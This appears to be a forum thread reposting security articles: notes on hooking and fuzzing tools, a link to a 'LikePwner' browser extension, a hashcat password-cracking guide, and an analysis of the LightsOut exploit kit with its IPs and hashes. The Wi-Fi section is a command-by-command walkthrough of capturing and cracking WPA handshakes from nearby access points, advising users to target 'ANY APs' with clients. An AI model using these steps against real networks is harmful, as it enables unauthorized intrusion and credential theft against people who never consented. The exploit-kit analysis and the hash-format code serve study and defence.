[h=2]HookME 0.2 – API Spying Tool[/h]April 28th, 2013 Mourad Ben Lakhoua Hooking API calls on an operating system allows intercepting useful information. A new release of HookMe has been issued to add more stability to the application, a way to choose which API functions to hook, and some fixes to the program. HookMe provides a nice graphical user interface allowing you to change the packet content in real time, dropping or forwarding the packet. It also has a Python plugin system to extend the HookMe functionality. HookME application interface (click to enlarge) The tool can be perfectly used in penetration testing for analyzing and modifying network protocols, creating some types of malware or backdoors for PoC embedded into network protocols, hooking the API calls for sending and receiving network data (even SSL clear data), or investigating any rootkit that is hooking API calls. You can download the latest version of HookMe over this link: https://code.google.com/p/hookme/ Sursa: HookME 0.2 – API Spying Tool | SecTechno
-
[h=2]Fino Android Security Assessment Tool[/h]February 2nd, 2014 Mourad Ben Lakhoua Security assessment tools have several ways of conducting the technical analysis. Fino is another program that you can use to run dynamic analysis of Android-based applications. The tool allows injecting services into the application for controlling and monitoring the changes. The Android application we want to verify will be running in an emulator that is called a gadget, or what we usually call a sandbox, and will dynamically verify all changes on the system. Next it is possible to run Python scripts to get or modify the services. You may get all target activities by running “activities = app.find(‘android.app.Activity’)“. The idea of monitoring services with the injection lets you monitor the application from inside, and you will have details about the Android application with more accurate results. Fino's design is in the slide deck; the full PDF file is over here: http://events.ccc.de/congress/2012/Fahrplan/attachments/2237_SmallFootprintInspectionAndroid-slides.pdf You can download Fino on the following link: https://github.com/sysdream/fino Sursa: Fino Android Security Assessment Tool | SecTechno
-
[h=2]Fuzzware 1.5- Fuzzing Tool[/h]March 2nd, 2014 Mourad Ben Lakhoua Fuzzing is a process that is used during a penetration test to find out if the application is vulnerable. The process consists of sending incorrect data to the targeted application in order to cause a failure or an error situation that security analysts will use as a PoC in their report. Fuzzware is a generic fuzzing framework that can be considered for such an operation. Fuzzware UI (click to enlarge) Fuzzware allows you to make test cases as required: fuzz a file format such as an XML file; fuzz a network protocol or a network service by sending predefined network packets; fuzz an interface that you need to test, including web services; you can define a custom input that is coming from code. You can download Fuzzware 1.5 over this link: download Sursa: Fuzzware 1.5- Fuzzing Tool | SecTechno
-
https://rstforums.com/proiecte/LikePwnerChromeExtension.crx
-
Cracking MD5, phpBB, MySQL and SHA1 passwords Cracking MD5, phpBB, MySQL and SHA1 passwords with Hashcat, cudaHashcat, oclHashcat on Kali Linux Hashcat or cudaHashcat is the self-proclaimed world’s fastest CPU-based password recovery tool. Versions are available for Linux, OSX, and Windows and can come in CPU-based or GPU-based variants. Hashcat or cudaHashcat currently supports a large range of hashing algorithms, including: Microsoft LM Hashes, MD4, MD5, SHA-family, Unix Crypt formats, MySQL, Cisco PIX, and many others. Contents Cracking MD5, phpBB, MySQL and SHA1 passwords with Hashcat, cudaHashcat, oclHashcat on Kali Linux My Setup NVIDIA Users: AMD Users: [*]Getting hashes: [*]Cracking hashed MD5 passwords MD5 cracking using hashcat and cudahashcat [*]Cracking hashed MD5 – phpBB passwords MD5 – phpBB cracking using hashcat and cudahashcat [*]Cracking hashed MySQL passwords MySQL hashed password cracking using hashcat and cudahashcat [*]Cracking hashed SHA1 passwords SHA1 password cracking using hashcat and cudahashcat [*]Location of Cracked passwords [*]Creating HASH’es using Kali [*]Conclusion [*]Google+ Hashcat or cudaHashcat comes in two main variants: Hashcat – A CPU-based password recovery tool oclHashcat or cudaHashcat – A GPU-accelerated tool Many of the algorithms supported by Hashcat or cudaHashcat can be cracked in a shorter time by using the well-documented GPU-acceleration leveraged in oclHashcat or cudaHashcat (such as MD5, SHA1, and others). However, not all algorithms can be accelerated by leveraging GPUs. Hashcat or cudaHashcat is available for Linux, OSX and Windows. oclHashcat or cudaHashcat is only available for Linux and Windows due to improper implementations in OpenCL on OSX. My Setup My setup is simple. I have a NVIDIA GTX 210 Graphics card in my machine running Kali Linux 1.0.6 and will use rockyou dictionary for this whole exercise. 
In this post, I will show how to crack a few of the most common hashes MD5 MD5 – phpBB MySQL and SHA1 I will use 2 commands for every hash, hashcat and then cudahashcat. Because I am using an NVIDIA GPU, I get to use cudaHashcat. If you’re using an AMD GPU, then I guess you’ll be using oclHashcat. Correct me if I am wrong here! Before you enable GPU Cracking: I’ve spent the last few months writing guides on how to enable those features in Kali Linux. NVIDIA Users: Install proprietary NVIDIA driver on Kali Linux – NVIDIA Accelerated Linux Graphics Driver Install NVIDIA driver kernel Module CUDA and Pyrit on Kali Linux – CUDA, Pyrit and Cpyrit-cuda AMD Users: Install AMD ATI proprietary fglrx driver in Kali Linux 1.0.6 Install AMD APP SDK in Kali Linux Install Pyrit in Kali Linux Install CAL++ in Kali Linux AMD is currently much faster in terms of GPU cracking, but then again it really depends on your card. You can generate more hashes or collect them and attempt to crack them. Because I am using a dictionary (it’s just 135MB), I am limited to a select number of passwords. The bigger your dictionary is, the more success you’ll have cracking an unknown hash. There are other ways of cracking them without using a Dictionary (such as Rainbow Tables etc.). I will try to cover and explain as much as I can. Advanced users, I’m sure you already know these, so I would appreciate constructive comments. As always, read the manual and help file before you ask for help. Most of the things are covered in the manuals and wiki available at www.hashcat.net. A big thanks goes to the Hashcat or cudaHashcat Dev team, they are the ones who created and maintained this so well. Kudos! Getting hashes: First of all, we need to get our hashes. You can download hash generator applications, but there are online sites that will allow you to create them. I will use InsidePro who kindly created a page that allows you to create hashes on the fly and it’s publicly available. 
Visit them and feel free to browse their website to understand more about hashes. The password I am using is simple: abc123 All you need to do is enter this in the password field of this page Hash Generator and click on generate. Cracking hashed MD5 passwords From the site, I copied the md5 hashed password and put it into a file. vi md5-1.txt cat md5-1.txt MD5 cracking using hashcat and cudahashcat Now it’s simple, I just typed in the following command and it took a few seconds. hashcat -m 0 -a 0 /root/md5-1.txt /root/rockyou.txt Similarly, I can use cudahashcat. cudahashcat -m 0 -a 0 /root/md5-1.txt /root/rockyou.txt Cracking hashed MD5 – phpBB passwords From the site, copy the phpBB hashed password and put it into a file. vi md5phpbb-1.txt cat md5phpbb-1.txt What I didn’t explain in the previous section is how you know which mode to use or which attack code. You can type in hashcat --help or cudahashcat --help and read through it. Because I will stick with attack mode 0 (Straight Attack Mode), I just need to adjust the value for -m where you specify which type of hash it is. hashcat --help | grep php So it’s 400 MD5 – phpBB cracking using hashcat and cudahashcat Let’s adjust our command and run it. hashcat -m 400 -a 0 /root/md5phpbb-1.txt /root/rockyou.txt and cudahashcat cudahashcat -m 400 -a 0 /root/md5phpbb-1.txt /root/rockyou.txt Cracking hashed MySQL passwords Similar step: we get the hash from the website and stick that into a file. vi mysql-1.txt cat mysql-1.txt NOTE: *6691484EA6B50DDDE1926A220DA01FA9E575C18A <– this was the hash from the website, remove * from this one before you save this hash. First of all let’s find out the mode we need to use for MySQL password hashes. 
hashcat --help | grep My Ah, I’m not sure which one to use here … MySQL hashed password cracking using hashcat and cudahashcat I’ll try 200 and see how that goes … hashcat -m 200 -a 0 /root/mysql-1.txt /root/rockyou.txt Nope, not good. Let’s try 300 this time… hashcat -m 300 -a 0 /root/mysql-1.txt /root/rockyou.txt and cudahashcat cudahashcat -m 300 -a 0 /root/mysql-1.txt /root/rockyou.txt Cracking hashed SHA1 passwords Similar step: we get the hash from the website and stick that into a file. vi sha1-1.txt cat sha1-1.txt Let’s find out the mode we need to use for SHA1 password hashes. hashcat --help | grep SHA1 SHA1 password cracking using hashcat and cudahashcat We already know what to do next… hashcat -m 100 -a 0 /root/sha1-1.txt /root/rockyou.txt and cudahashcat cudahashcat -m 100 -a 0 /root/sha1-1.txt /root/rockyou.txt Location of Cracked passwords Hashcat or cudaHashcat saves all recovered passwords in a file. It will be in the same directory you’ve run Hashcat or cudaHashcat or oclHashcat from. In my case, I’ve run all commands from my home directory, which is the /root directory. cat hashcat.pot Creating HASH’es using Kali As always, great feedback from zimmaro, Thanks. See his comment below: (I’ve removed IP and email details for obvious reasons). dude got some massive screen!!! 1920×1080 16:9 HD 1080p!!! [TABLE] [TR] [TD]zimmaro_the_g0at <email truncated> <ip address truncated>[/TD] [TD] Submitted on 2014/03/30 at 2:43 am as always (our friend): excellent explanation and thank you for sharing your knowledge / experiences PS: if I may, some “” basic-hash “” can be generated directly with our KALI ImagesTime.com-hash.PNG [/TD] [/TR] [/TABLE] Conclusion This guide is here to show you how you can crack passwords using simple attack mode. You might ask why I showed the same command over and over again! Well, by the end of this guide, you will never forget the basics. There’s of course advanced usage, but you need to have strong basics. 
I would suggest reading the Wiki and Manuals from www.hashcat.net to get a better understanding of rule based attacks because that’s the biggest strength of Hashcat. The guys in the Hashcat forums are very knowledgeable and know what they are doing. If you need to know anything, you MUST read the manuals before you go and ask something. Usually RTFM is the first response … so yeah, tread lightly. Thanks for reading. Feel free to share this article. Sursa: Cracking MD5, phpBB, MySQL and SHA1 passwords with Hashcat on Kali Linux | blackMORE Ops
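The guide above maps each hash to a hashcat mode (-m 0, 100, 300, 400) by eye; the following added example (not from the original post) reproduces those four formats in standard-library Python so the mode choice, and the "remove the leading *" note for MySQL, can be checked against a known password. The phpass salt and cost used below are constructed values; "abc123" is the password the guide uses.

```python
"""Reproduce the hash formats the guide feeds to hashcat -m 0 / 100 / 300 / 400.

Added example, not part of the original post. Standard library only."""
import hashlib
import hmac
import os

# phpass's own 64-character alphabet (shared by phpBB3 "$H$" and WordPress "$P$").
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def md5_hex(password: str) -> str:
    """hashcat -m 0: raw, unsalted MD5 of the password."""
    return hashlib.md5(password.encode()).hexdigest()


def sha1_hex(password: str) -> str:
    """hashcat -m 100: raw, unsalted SHA1 of the password."""
    return hashlib.sha1(password.encode()).hexdigest()


def mysql41(password: str) -> str:
    """hashcat -m 300: MySQL 4.1+/5.x PASSWORD() = '*' + SHA1(SHA1(pw)) in upper-case hex.
    MySQL stores the leading '*'; the guide strips it before saving the hash for hashcat."""
    inner = hashlib.sha1(password.encode()).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()


def _phpass_encode64(data: bytes) -> str:
    """phpass's base64 variant (not RFC 4648): 16 digest bytes -> 22 characters."""
    out, i, n = [], 0, len(data)
    while i < n:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < n:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= n:
            break
        i += 1
        if i < n:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= n:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)


def phpass_hash(password: str, salt: str, cost_log2: int = 11, prefix: str = "$H$") -> str:
    """hashcat -m 400: phpass, the "MD5 - phpBB" format in the guide.
    Layout: prefix + ITOA64[cost_log2] + 8-char salt + 22-char encoded digest.
    Digest = MD5(salt + pw), then MD5(prev + pw) repeated 2**cost_log2 times."""
    if len(salt) != 8 or not 7 <= cost_log2 <= 30:
        raise ValueError("phpass needs an 8-character salt and a cost between 7 and 30")
    pw = password.encode()
    digest = hashlib.md5(salt.encode() + pw).digest()
    for _ in range(1 << cost_log2):
        digest = hashlib.md5(digest + pw).digest()
    return prefix + ITOA64[cost_log2] + salt + _phpass_encode64(digest)


def phpass_verify(password: str, stored: str) -> bool:
    """Recompute from the salt and cost embedded in the stored string and compare."""
    if len(stored) != 34 or stored[:3] not in ("$H$", "$P$"):
        return False
    cost_log2 = ITOA64.find(stored[3])
    if not 7 <= cost_log2 <= 30:
        return False
    candidate = phpass_hash(password, stored[4:12], cost_log2, stored[:3])
    return hmac.compare_digest(candidate, stored)


def new_phpass_salt() -> str:
    """Random 8-character salt drawn from the phpass alphabet."""
    return "".join(ITOA64[b & 0x3F] for b in os.urandom(8))


if __name__ == "__main__":
    pw = "abc123"                     # the password used throughout the guide
    print("-m 0   ", md5_hex(pw))
    print("-m 100 ", sha1_hex(pw))
    print("-m 300 ", mysql41(pw))
    print("-m 400 ", phpass_hash(pw, new_phpass_salt()))   # constructed salt
```

Note that only the phpass format carries a salt and an iteration count; the other three are a single unsalted digest, which is why the guide's dictionary runs finish in seconds.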
-
Cracking WPA WPA2 with Hashcat on Kali Linux (BruteForce MASK based attack on Wifi passwords) This entry was posted in Cracking How to Kali Linux Linux and tagged Cracking Hashcat How to Wifi on March 27, 2014 by blackMORE Ops. Cracking WPA WPA2 with Hashcat oclHashcat or cudaHashcat on Kali Linux (BruteForce MASK based attack on Wifi passwords) cudaHashcat or oclHashcat or Hashcat on Kali Linux has built-in capabilities to attack and decrypt or crack WPA WPA2 handshake .cap files. The only constraint is, you need to convert a .cap file to the .hccap file format. This is rather easy. Contents Cracking WPA WPA2 with Hashcat oclHashcat or cudaHashcat on Kali Linux (BruteForce MASK based attack on Wifi passwords) My Setup NVIDIA Users: AMD Users: [*]Why use Hashcat to crack WPA/WPA2 handshake file? Built-in charsets Numbered passwords Letter passwords – All uppercase Letter passwords – All lowercase Passwords – Lowercase letters and numbers Passwords – Uppercase letters and numbers Passwords – Mixed matched with uppercase, lowercase, number and special characters. Passwords – when you know a few characters [*]Capture handshake with WiFite [*]Cleanup your cap file using wpaclean [*]Convert .cap file to .hccap format [*]Cracking WPA/WPA2 handshake with Hashcat [*]Dictionary attack [*]Brute-Force Attack Sample: Sample .hcmask file [*]Location of Cracked passwords [*]Conclusion [*]Google+ My Setup I have an NVIDIA GTX 210 Graphics card in my machine running Kali Linux 1.0.6 and will use the rockyou dictionary for most of the exercise. In this post, I will show how to crack WPA/WPA2 handshake files (.cap files) with cudaHashcat or oclHashcat or Hashcat on Kali Linux. I will use the cudahashcat command because I am using an NVIDIA GPU. If you’re using an AMD GPU, then I guess you’ll be using oclHashcat. Let me know if this assumption is incorrect. To enable GPU Cracking, you need to install either CUDA for NVIDIA or AMDAPPSDK for AMD graphics cards. I’ve covered those in my previous posts. 
NVIDIA Users: Install proprietary NVIDIA driver on Kali Linux – NVIDIA Accelerated Linux Graphics Driver Install NVIDIA driver kernel Module CUDA and Pyrit on Kali Linux – CUDA, Pyrit and Cpyrit-cuda AMD Users: Install AMD ATI proprietary fglrx driver in Kali Linux 1.0.6 Install AMD APP SDK in Kali Linux Install Pyrit in Kali Linux Install CAL++ in Kali Linux Why use Hashcat to crack WPA/WPA2 handshake file? Pyrit is the fastest when it comes to cracking WPA/WPA2 handshake files. So why are we using Hashcat to crack WPA/WPA2 handshake files? Because we can? Because Hashcat allows us to use customized attacks with predefined rules and Masks. Now this doesn’t explain much and reading the HASHCAT Wiki will take forever to explain how to do it. I’ll just give some examples to clear it up. Hashcat allows you to use the following built-in charsets to attack a WPA/WPA2 handshake file. Built-in charsets ?l = abcdefghijklmnopqrstuvwxyz ?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ ?d = 0123456789 ?s = !”#$%&'()*+,-./:;<=>?@[\]^_`{|}~ ?a = ?l?u?d?s Numbered passwords So let’s say your password is 12345678. You can use a custom MASK like ?d?d?d?d?d?d?d?d What it means is that you’re trying to break an 8 digit number password like 12345678 or 23456789 or 01567891.. You get the idea. Letter passwords – All uppercase If your password is all letters in CAPS such as: ABCFEFGH or LKHJHIOP or ZBTGYHQS ..etc. then you can use the following MASK: ?u?u?u?u?u?u?u?u It will crack all 8 Letter passwords in CAPS. Letter passwords – All lowercase If your password is all letters in lowercase such as: abcdefgh or dfghpoiu or bnmiopty..etc. then you can use the following MASK: ?l?l?l?l?l?l?l?l It will crack all 8 Letter passwords in lowercase. I hope you now see what I am getting at. Passwords – Lowercase letters and numbers If you know your password is similar to this: a1b2c3d4 or p9o8i7u6 or n4j2k5l6 …etc. 
then you can use the following MASK: ?l?d?l?d?l?d?l?d Passwords – Uppercase letters and numbers If you know your password is similar to this: A1B2C3D4 or P9O8I7U6 or N4J2K5L6 …etc. then you can use the following MASK: ?u?d?u?d?u?d?u?d Passwords – Mixed matched with uppercase, lowercase, number and special characters. If your password is all random, then you can just use a MASK like the following: ?a?a?a?a?a?a?a?a Note: ?a represents anything …. I hope you’re getting the idea. If you are absolutely not sure, you can just use any of the predefined MASK files and leave it running. But yeah, come back to check in a million years for a really long password …. Using a dictionary attack might have more success in that scenario. Passwords – when you know a few characters If you somehow know a few characters of the password, this will make things a lot faster. For every known letter, you save an immense amount of computing time. MASKs allow you to combine this. Let’s say your 8 character password starts with abc and doesn’t contain any special characters. Then you can create a MASK rule file to contain the following: abc?l?l?l?l?l abc?u?u?u?u?u abc?d?d?d?d?d abc?l?u??d??d?l abc?d?d?l?u?l There will be 125 combinations in this case. But it will surely break it in time. This is the true power of using cudaHashcat or oclHashcat or Hashcat on Kali Linux to break WPA/WPA2 passwords. You can even up your system if you know how a person combines a password. Some people always use UPPERCASE as the first character in their passwords, a few lowercase letters and finish with numbers. Example: Abcde123 Your mask will be: ?u?l?l?l?l?d?d?d This will make cracking significantly faster. Social engineering is the key here. That’s enough with MASKs. Now let’s capture some WPA/WPA2 handshake files. The following WiFite section was taken from a previous guide, Cracking Wifi WPA/WPA2 passwords using pyrit cowpatty in Kali Linux, which was one of the best guides about cracking Wifi passwords out there. 
Capture handshake with WiFite Why WiFite instead of other guides that use Aircrack-ng? Because we don’t have to type in commands.. Type in the following command in your Kali Linux terminal: wifite -wpa You could also type in wifite wpa2 If you want to see everything (wep, wpa or wpa2), just type the following command. It doesn’t make any difference except a few more minutes wifite Once you type it in, the following is what you’ll see. So, we can see a bunch of Access Points (AP in short). Always try to go for the ones with CLIENTS because it’s just much faster. You can choose all or pick by numbers. See screenshot below Awesome, we’ve got a few with clients attached. I will pick 1 and 2 cause they have the best signal strength. Try picking the ones with good signal strength. If you pick one with poor signal, you might be waiting a LONG time before you capture anything .. if anything at all. So I’ve picked 1 and 2. Press Enter to let WiFite do its magic. Once you press ENTER, the following is what you will see. I got impatient as the number 1 choice wasn’t doing anything for a LONG time. So I pressed CTRL+C to quit out of it. This is actually a great feature of WiFite. It now asks me, What do you want to do? [c]ontinue attacking targets [e]xit completely. I can type in c to continue or e to exit. This is the feature I was talking about. I typed c to continue. What it does, it skips choice 1 and starts attacking choice 2. This is a great feature cause not all routers or APs or targets will respond to an attack the same way. You could of course wait and eventually get a response, but if you’re just after ANY APs, it just saves time. And voila, it took only a few seconds to capture a handshake. This AP had lots of clients and I managed to capture a handshake. This handshake was saved in the /root/hs/BigPond_58-98-35-E9-2B-8D.cap file. Once the capture is complete and there are no more APs to attack, Wifite will just quit and you get your prompt back. 
Now that we have a capture file with a handshake in it, we can do a few things. Cleanup your cap file using wpaclean The next step will be converting the .cap file to a format cudaHashcat or oclHashcat or Hashcat on Kali Linux will understand. Here’s how to do it: To convert your .cap files manually in Kali Linux, use the following command wpaclean <out.cap> <in.cap> Please note that the wpaclean options are the wrong way round. <out.cap> <in.cap> instead of <in.cap> <out.cap> which may cause some confusion. In my case, the command is as follows: wpaclean hs/out.cap hs/BigPond_58-98-35-E9-2B-8D.cap Convert .cap file to .hccap format We need to convert this file to a format cudaHashcat or oclHashcat or Hashcat on Kali Linux can understand. To convert it to .hccap format with “aircrack-ng” we need to use the -J option aircrack-ng <out.cap> -J <out.hccap> Note the -J is a capital J, not lower case j. In my case, the command is as follows: aircrack-ng hs/out.cap -J hs/out Cracking WPA/WPA2 handshake with Hashcat cudaHashcat or oclHashcat or Hashcat on Kali Linux is very flexible, so I’ll cover the two most common and basic scenarios: Dictionary attack Mask attack Dictionary attack Grab some Wordlists, like Rockyou. Read this guide Cracking Wifi WPA/WPA2 passwords using pyrit cowpatty in Kali Linux for detailed instructions on how to get this dictionary file and sorting/cleaning etc. First we need to find out which mode to use for WPA/WPA2 handshake files. I’ve covered this at great length in the Cracking MD5, phpBB, MySQL and SHA1 passwords with Hashcat on Kali Linux guide. Here’s a short rundown: cudahashcat --help | grep WPA So it’s 2500. Now use the following command to start the cracking process: cudahashcat -m 2500 /root/hs/out.hccap /root/rockyou.txt Bingo, I used a common password for this Wireless AP. Took me a few seconds to crack it. Depending on your dictionary size, it might take a while. 
You should remember, if you’re going to use Dictionary attack, Pyrit would be much much much faster than cudaHashcat or oclHashcat or Hashcat. Why we are showing this here? Cause we can. Another guide explains how this whole Dictionary attack works. I am not going to explain the same thing twice here. Read Cracking MD5, phpBB, MySQL and SHA1 passwords with Hashcat on Kali Linux for dictionary related attacks in full length. Brute-Force Attack Now this is the main part of this guide. Using Brute Force MASK attack. To crack WPA WPA2 handshake file using cudaHashcat or oclHashcat or Hashcat, use the following command: Sample: cudahashcat -m 2500 -a 3 capture.hccap ?d?d?d?d?d?d?d?d Where -m = 2500 means we are attacking a WPA/WPA2 handshake file. -a = 3 means we are using Brute Force Attack mode (this is compatible with MASK attack). capture.hccap = This is your converted .cap file. We generated it using wpaclean and aircrack-ng. ?d?d?d?d?d?d?d?d = This is your MASK where d = digit. That means this password is all in numbers. i.e. 7896435 or 12345678 etc. I’ve created a special MASK file to make things faster. You should create your own MASK file in similar way I explained earlier. I’ve saved my file in the following directory as blackmoreops-1.hcmask. /usr/share/oclhashcat/masks/blackmoreops-1.hcmask Do the following to see all available default MASK files provided by cudaHashcat or oclHashcat or Hashcat: ls /usr/share/oclhashcat/masks/ In my case, the command is as follows: cudahashcat -m 2500 -a 3 /root/hs/out.hccap /usr/share/oclhashcat/masks/blackmoreops-1.hcmask Sample .hcmask file You can check the content of a sample .hcmask file using the following command: tail -10 /usr/share/oclhashcat/masks/8char-1l-1u-1d-1s-compliant.hcmask Edit this file to match your requirement, run Hashcat or cudaHashcat and let it rip. Location of Cracked passwords Hashcat or cudaHashcat saves all recovered passwords in a file. 
It will be in the same directory you’ve run Hashcat or cudaHashcat or oclHashcat from. In my case, I’ve run all commands from my home directory, which is the /root directory. cat hashcat.pot Conclusion This guide explains a lot. But you should read the Wiki and Manuals from www.hashcat.net to get a better understanding of MASK and Rule based attacks because that’s the biggest strength of Hashcat. Thanks for reading. Feel free to share this article. Sursa: Cracking WPA WPA2 with Hashcat on Kali Linux (BruteForce MASK based attack on Wifi passwords) | blackMORE Ops
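The mask section of the guide above describes how much a known prefix or structure shrinks the search, but never puts a number on it. The following added example (not from the original post) parses hashcat masks and .hcmask files with the built-in charsets the guide lists, including the "??" escape for a literal question mark that appears in the "abc" mask file, and turns the keyspace into a worst-case time at a given hash rate; the same arithmetic is what a defender uses to judge whether a password policy survives a mask attack. The sample .hcmask body and the 10 kH/s rate are constructed values.

```python
"""Keyspace estimator for hashcat brute-force masks and .hcmask files.

Added example, not part of the original post. Only the built-in charsets
?l ?u ?d ?s ?a are handled; custom charsets (?1..?4) are out of scope."""
import math

# Sizes of hashcat's built-in charsets as listed in the guide (?s = 33 symbols, ?a = ?l?u?d?s).
CHARSET_SIZES = {"l": 26, "u": 26, "d": 10, "s": 33, "a": 95}


def parse_mask(mask: str) -> list:
    """Return one entry per output character: a charset size, or 1 for a literal.
    '??' is hashcat's escape for a literal '?' (as in abc?l?u??d??d?l)."""
    sizes = []
    i = 0
    while i < len(mask):
        ch = mask[i]
        if ch == "?":
            if i + 1 >= len(mask):
                raise ValueError(f"dangling '?' at end of mask {mask!r}")
            nxt = mask[i + 1]
            if nxt == "?":
                sizes.append(1)                     # escaped literal '?'
            elif nxt in CHARSET_SIZES:
                sizes.append(CHARSET_SIZES[nxt])
            else:
                raise ValueError(f"unknown charset ?{nxt} in mask {mask!r}")
            i += 2
        else:
            sizes.append(1)                         # plain literal character
            i += 1
    return sizes


def keyspace(mask: str) -> int:
    """Number of candidates a single mask produces."""
    return math.prod(parse_mask(mask))


def hcmask_keyspace(text: str) -> int:
    """Total candidates for the body of a .hcmask file (blank lines and '#' comments skipped)."""
    total = 0
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith("#"):
            total += keyspace(line)
    return total


def worst_case_seconds(candidates: int, rate_per_second: float) -> float:
    """Seconds to exhaust the keyspace at a given rate (WPA2 is a slow hash, so rates are low)."""
    return candidates / rate_per_second


# Constructed .hcmask body modelled on the "starts with abc" example in the guide.
SAMPLE_HCMASK = """
# 8-character passwords that start with abc
abc?l?l?l?l?l
abc?u?u?u?u?u
abc?d?d?d?d?d
abc?l?u??d??d?l
abc?d?d?l?u?l
"""

if __name__ == "__main__":
    rate = 10_000                                   # constructed: 10 kH/s WPA2
    for m in ("?d?d?d?d?d?d?d?d", "?u?l?l?l?l?d?d?d", "?a?a?a?a?a?a?a?a"):
        n = keyspace(m)
        days = worst_case_seconds(n, rate) / 86_400
        print(f"{m:20} {n:>22,} candidates  ~{days:,.1f} days at {rate:,} H/s")
    print(f"sample .hcmask total: {hcmask_keyspace(SAMPLE_HCMASK):,} candidates")
```

The escaped-literal masks in the sample file produce far fewer candidates than their length suggests, which is the point the guide is making: every fixed character removes a whole charset from the product.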
-
Continued analysis of the LightsOut Exploit Kit At the end of March, we disclosed the coverage of an Exploit Kit we called “Hello” (VRT: Hello, a new specifically covered exploit kit), or “LightsOut”; we thought we’d do a follow-up post to tear this exploit kit apart a bit more. This variant of the LightsOut exploit kit uses a number of Java vulnerabilities, and targets multiple browsers. The primary goal is to drop & execute a downloader executable, which in turn downloads and executes more malware samples. These secondary malware samples are run in a sequence, and do some information harvesting, and potentially exfiltrate the information harvested. Overall, not fun for visitors to sites compromised with the LightsOut exploit kit. Because of the number of Java vulnerabilities leveraged by this kit, it's important to keep Java updated, and make certain that outdated versions of Java aren't still sticking around on your PC. You can download a utility from Oracle to remove outdated versions of Java, referenced by this article: https://www.java.com/en/download/faq/uninstaller_toolinfo.xml. A detailed analysis on how the kit operates is below, under Browser Trajectory Analysis. 
Java CVEs: CVE-2013-2465 - Incorrect image channel verification (buffered image) CVE-2012-1723 - Classloader vulnerability CVE-2013-2423 - Java Security Prompt / Warning bypass Microsoft Internet Explorer CVEs: CVE-2013-1347 - CGenericElement Object Use-After-Free Vulnerability CVE-XXXX-XXXX - Pending verification of another heap spray leveraging a use-after-free Browsers explicitly targeted: Chrome, Internet Explorer Snort SIDs that should catch parts of this kit: SIDs: 26569 through 26572, 26603 and 26668 First stage dropper: VT: https://www.virustotal.com/en/file/164de09635532bb0a4fbe25ef3058b86dac332a03629fc91095a4c7841b559da/analysis/ C&C Server: 93.171.216.118 IP Address hosting malware: 93.188.161.235 Secondary dropped malware sample sha256 hashes: 1218d79fca1aca48e13a5e6e582cdc5c4d24c3367328c56d61d975a757509335 fl.jpg ac9294849559c94d5e85cb113ce8ca61bca2e576a97a9e81f66321496ddada61 tl.jpg 5ee0761f5eda01985d5f93a5e50a1247fb5c17deba1d471b05fc09751d09a08e shot.jpg a26f3225aa7e7b5263033dee682153fb7a4332429782c5755a9eaebe8a5df095 inf.jpg JavaScript IDS evasion methods: Sample encoded string (remove all digits) from JavaScript "836f4974362o65679305r82637150N61617044a77736359m99323481e9388" becomes "forName" [h=2]Browser Trajectory Analysis[/h] [h=3]Stage 1: dtsrc.php - detect installed fonts, direct to 1st stage of exploits via IFRAME[/h] The first stage leverages a holdover technique from the Internet Explorer 6 era – the HtmlDlgSafeHelper ActiveX control – to check if a list of over 700 fonts is available to the browser. This is entirely unrelated to any compromise method, but may be a method of "fingerprinting" the installed version and language packs of Windows + Internet Explorer, based on available fonts. The list of found fonts is concatenated together, MD5 hashed, and the hash is submitted to the malicious site. 
[h=3]Stage 2: dtsrc.php?a=h1 - plugin detection javascript, direction to individual exploits based on browser + plugins[/h] dtsrc.php?a=h1 has JavaScript that detects the environment in the browser to determine which exploits to direct the browser to. The JavaScript is obfuscated and minified (placed all on one line -- use a beautifier utility, or something like http://jsbeautifier.org for an online version). In-lines the PluginDetect JS library from PluginDetect. Interesting: has unused/commented-out code for detecting Microsoft SharePoint plugins. All of the exploits are called by dynamically appending an <IFRAME> tag to the document, pointing to one of the exploit URLs. This is the common IFRAME function leveraged by the dtsrc.php?a=h1 page. Here’s the unused detection routine for SharePoint — this may be an incomplete attempt to exploit the MS13-080 Microsoft Internet Explorer CDisplayPointer Use-After-Free vulnerability. [h=3]Browser compromise flow:[/h] [h=4]IE 7 on XP ––> h5 exploit page, then:[/h] Java 6 update <= 32 = h7 exploit page OR Java 7 update <= 17 = h2 exploit page [h=4]IE 8 on XP ––> h6 exploit page, then:[/h] Java 6 update <= 32 = h7 exploit page OR Java 7 update <= 17 = h2 exploit page [h=4]IE 6 on XP ––> h4 exploit page, then:[/h] Java 6 update <= 32 = h7 exploit page OR Java 7 update <= 17 = h2 exploit page [h=4]Chrome on Windows ––> Java 7 update <= 7 = h3 exploit page[/h] [h=4]Any browser ––> Java 6 update <= 32 = h7 exploit page (see above screenshot)[/h] OR Java 7 update <= 17 = h2 exploit page [h=3]Stage 3: dtsrc.php?a={??} where {??} is one of the h2/h3 etc below[/h] [h=4]h2 == Java 7 update <= 17 CVE-2013-2423[/h] This uses a base64 encoded JNLP with applet parameter __applet_ssv_validated=true for the CVE-2013-2423 warning bypass Loads the r2 JAR for downloading the dropper And if we base64 decode the jnlp_embedded parameter, here’s the warning dialog bypass: [h=4]h3 == Chrome w/ Java 7 update <= 17 CVE-2013-2423[/h] Nearly exactly the same 
